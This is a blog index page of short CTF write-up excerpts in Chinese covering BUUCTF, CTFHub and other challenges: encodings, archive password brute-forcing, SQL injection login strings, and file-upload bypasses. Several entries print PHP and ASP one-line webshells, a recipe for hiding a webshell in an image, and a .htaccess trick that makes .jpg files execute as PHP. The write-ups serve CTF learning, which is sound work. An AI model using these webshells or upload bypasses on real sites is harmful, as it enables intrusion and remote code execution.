- 博客(20)
- 收藏
- 关注
RSS订阅原创 cazy长安战役八卦迷宫
这样可以走通,找出对应的图形,拼出各自所对应的汉字拼音,即为flagCazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}
2022-06-22 15:46:00
177
1
原创 某次比赛wp
栅栏密码在线转换flag{ b9b91a3ee3c4cb441bce9539cf221f28 }属性里将十六进制字符转为文本字符串flag{585abd6e451a4b4f96ecf04060167bd9}下载附件,打开后是一张图片,图片部分区域被打上了马赛克那些半露出的命令有点熟悉,Tab补全猜测路径/usr/bin/head -n 1 /etc/passwd | /usr/bin/awk -F: ‘{printf $1}’ | /usr/bin/md5sumflag{63a9f0ea7bb98
2022-06-22 15:42:25
204
原创 你看矛盾吗?
矛盾矛盾,flag提交格式为:flag{}考点:代码审计、构造payload<?php$num=$_GET['num'];if(!is_numeric($num)){echo $num;if($num==1)echo 'flag{**********}';}?>GET请求向服务器提交的参数num的值不能是单纯由数字组成的字符串,且参数num值必须等于1,才能得到flag,前后自相矛盾,但是php是门弱类型语言,字符串与数字在进行比较时,会截取字符串的前面数字部分与整型
2022-01-05 11:42:32
266
原创 记一次比赛wp
[萌新]在哪呢打开之后是这样全选文字,新建Word文档,粘贴进去flag{hey_there_is_no_thing}只是个PNG,别想太多了.png拖进Kali,binwalk分离一下,在这里找到了flagflag{zhe_ti_mu_ye_tai_bt_le_XD}CRYPTO[签到]键盘侠UYTGBNM EDCV UYTGBNM TGBUHM YTFVBH QAZXCDE TYUHN EDCTGBF RFVYGNflag{} 提交时括号内为大写字母照键盘画一下,为CLCKO
2021-12-13 13:50:13
185
原创 第四届美团杯UNZIP
你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。新的改变我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:全新的界面设计 ,将会带来全新的写作体验;在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;...
2021-12-12 12:00:00
333
原创 秘密文件
Buuctf misc 秘密文件binwalk 305df1f78bef4ccfd2a3bd0fe4a6c0d7.pcapng发现有rar文件更改文件后缀名,发现有密码用ARCHPR进行暴力破解
2021-03-14 09:02:56
443
原创 基础破解题解
** BUUCTF misc 基础破解**打开文件之后,是一个压缩包根据提示用ARCHPR进行暴力破解得到密码2563打开后发现是Base64,用Base64在线转换工具进行转换后就得到了flag
2021-03-11 21:50:26
136
原创 二维码+ZIP
BUUCTF misc 二维码题解扫描二维码发现显示 secret is here 并没什么再用010 Editor打开后,根据文件头和文件尾,发现是一张png图片,并且里面有一个ZIP文件发现该ZIP文件有密码,并且密码是四位数字,需要爆破用工具ziperello进行暴力破解,可以得到...
2021-03-11 21:24:14
209
原创 CTFHub文件上传 .htaccess题解
CTFHub文件上传 .htaccess题解查看页面源代码发现不可上传文件类型有很多去,于是上传类型为1.htaccess的文件,内容为AddType application/x-httpd-php .jpg上传成功后使用Burp Suite进行抓包,再改后缀名进行放包,最后连接中国蚁剑...
2021-03-11 14:16:15
406
原创 SQL
BUUCTF[极客大挑战 2019]EasySQL题解题目标题是SQL,用万能登录账户admin’or’1’=‘1,密码admin’or’1’='1,登录,发现登陆成功,就得到了flag
2021-03-10 19:24:56
76
原创 MIME验证
CTFHub 文件上传 MIME验证题解上传一句话木马,用Burp Suite进行抓包,并将其后缀名改为.php,然后放包连接中国蚁剑,得到flag
2021-03-09 21:30:17
255
原创 如何制作图片一句话木马
如何制作图片一句话木马新建一个文件夹,在其中放入一张图片(图片后缀名只要是图片的那几个后缀名即可)和一句话木马,例如:其中的一句话木马为<?php @eval($_POST["value"]);?>再写入一个cmd的bat文件然后打开bat文件 并输入copy tp.jpg/b+yjh.php shell.jpg这样就会在先前所建的文件夹里,得到了一张新的图片,我命名为了shell.jpg,这时我们就得到了所需要的图片一句话木马。...
2021-03-09 20:20:10
2946
原创 CTFHub题解
CTFHub题解文件上传 js前端验证查看该页面源代码,发现该页面允许上传的文件类型为.jpg,.png,.gif于是上传一句话木马yjh.jpg,使用Burp Suite进行抓包后,将所上传文件后缀名改为.php,再进行放包连接中国蚁剑,进行添加数据,就得到了flag相关知识点常见一句话木马常用一句话木马asp一句话木马:<%execute(request(“value”))%>php一句话木马:<?php @eval($_POST["value"]);?&g
2021-03-09 19:49:02
216
原创 HGAME2021 Level - Week1 Misc部分WP
HGAME2021 Level - Week1Misc部分WPBase全家福复制代码,用Base64在线解密工具解密,复制解密后的代码,用Base32在线解密工具解密,再复制解密后的代码,用Base16在线解密工具进行解密,就得到了flag相关知识点:Base64:包括大写字母(A-Z),小写字母(a-z) ,数字(0-9),以及 + /Base32:包括大写字母(A-Z), 数字(2-7)Base16:大写字母ABCDEF ,数字(0-9)具体参考大佬文章 http://blog.5
2021-03-06 19:24:00
185
原创 ctf.show crypto题解
标题ctf show crypto题解crypto1:将字符串逆序crypto2:打开浏览器控制台,复制粘贴JSFuck代码后回车,即可得到flag本题相关知识点:零、介绍jsfuck源于一门编程语言brainfuck,其主要的思想就是只使用8种特定的符号来编写代码。而jsfuck也是沿用了这个思想,它仅仅使用6种符号来编写代码。它们分别是(、)、+、[、]、!。一、从示例开始将下面这段神奇的代码贴到控制台试试看1 | [][(![]+[])][+!+[]]+(![]+[])[
2021-01-24 14:19:51
1041
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人